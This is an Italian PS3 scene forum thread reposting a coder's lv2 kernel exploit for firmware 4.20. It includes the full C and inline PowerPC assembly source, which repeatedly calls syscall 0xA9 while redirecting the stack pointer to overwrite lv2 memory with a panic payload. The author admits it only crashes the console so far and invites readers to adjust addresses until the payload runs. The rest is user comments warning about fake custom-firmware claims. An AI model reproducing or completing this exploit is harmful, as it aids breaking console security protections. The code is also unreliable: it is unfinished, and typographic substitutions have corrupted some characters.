Tranquilli... tempo ci vuole, ma uscirà per tutti vedrete.
PS: Prima però dovranno concludere tutti gli aggiornamenti credo, dopo si potrà avere tutto.
Il coder KDSBest rilascia un nuovo exploit per lv2 che sembrerebbe funzionare su 4.20,
al momento questo exploit serve solo a far crashare la console, ma è un ottimo inizio per la costruzione di un nuovo Custom Firmware su firmware superiori al 3.55
ince @naehrwert posted an lv2 exploit I will do so too . The stack pointer points to lv2 and if we do a syscall, the syscall saves register to the stack HAHA. Btw. It just crashes the console for now, since I totaly overwrite dump the lv2 or some memory addresses I don’t know. Feel free to try around, adjust the address of the stackpointer and so on. If you managed to get the panic payload executed. Tell me!!! ^^
//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf
register unsigned long long payloadHolder2 asm (“r21″);
register unsigned long long payloadHolder asm (“r20″);
register unsigned long long stackpointer asm (“r1″);
register unsigned long long counter asm (“r25″);
register unsigned long long bufferStackpointer asm (“r26″);
int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;
payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;
// Incrementer
counter = 0×00;
// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8… bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall
asm(“li %r0, 0×0″);
asm(“li %r3, 0×6″);
asm(“li %r4, 0×1″);
// li r11, 0x24F -> PANIC
asm(“mr %r22, %r20″);
asm(“mr %r23, %r20″);
asm(“mr %r24, %r20″);
asm(“mr %r27, %r20″);
asm(“mr %r28, %r20″);
asm(“mr %r29, %r20″);
asm(“mr %r30, %r20″);
asm(“mr %r31, %r20″);
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;
// We write sc
asm(“mr %r22, %r21″);
asm(“mr %r23, %r21″);
asm(“mr %r24, %r21″);
asm(“mr %r27, %r21″);
asm(“mr %r28, %r21″);
asm(“mr %r29, %r21″);
asm(“mr %r30, %r21″);
asm(“mr %r31, %r21″);
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;
if(counter < 0×1000000)
goto doItAgain;
stackpointer = bufferStackpointer;
return 0;
}
I didn’t managed to make it work on 4.21 so I just did on 4.20
Tranquilli... tempo ci vuole, ma uscirà per tutti vedrete.
PS: Prima però dovranno concludere tutti gli aggiornamenti credo, dopo si potrà avere tutto.
忍者
PS3の秘密
in effetti la notizia gira da un pò di giorni ormai!
L'universo è cambiamento; la nostra vita è il risultato dei nostri pensieri.
arriva l'invero e iniziano a fiorire notizie su eventuali exploit e cfw... non facciamoci infinocchiare come l'anno scorso! comprai la ps3 i primi di ottobre e seguii e seguo tutt'ora la scena ps3 qui su extreme, per fortuna ho il buon kmeaw altrimenti sai quante broccate? mi ricordo ancora tutti i vari fakeman... quindi non illudiamoci, possono trovare tutti gli exploit come fu illo tempore per il fw 3.70, poi 3.72 e tutto il resto, ma se nessuno ha il coraggio di pubblicare il fw?? mamma sony sappiamo bene che sguinzaglierà i suoi pitbull con la laurea in giurisprudenza!
eh vabbè ora iniziano i festival dei fakeman ........non date molto credito a ste cose , di solito è tutto fumo.
Postare rumors va bene, però parlo all'intera utenza: non commettiamo gli stessi errori del passato. Non credete ad ogni foto, video o messia che dice che ha creato il nuovo cfw. Seguiamo la vicenda in maniera critica e oggettiva.
Se vi sono stato utile e non sapete come sdebitarvi io vi consiglio di ascoltare il mio amico qui vicino. In fondo cliccare su una stella non costa nulla
quoto ace...
e per ora a quanto pare non sanno neanke cosa farsene di questo exploit...
io aspetto natale e poi vedi come vola la ps3....nuovo anno abbandono sony definitivamente..e se mai uscirà una consolle unica nel suo genere ..la comprerò soltanto dopo che l avranno ackerata..:D
straquoto! l anno scorso c è stato tutto un polverone...di balle e falsi!! andiamoci cauti e non lasciamoci trasportare...
stiamo arrivando di nuovo a natale ahaha fakeman in azione![]()
L'universo è cambiamento; la nostra vita è il risultato dei nostri pensieri.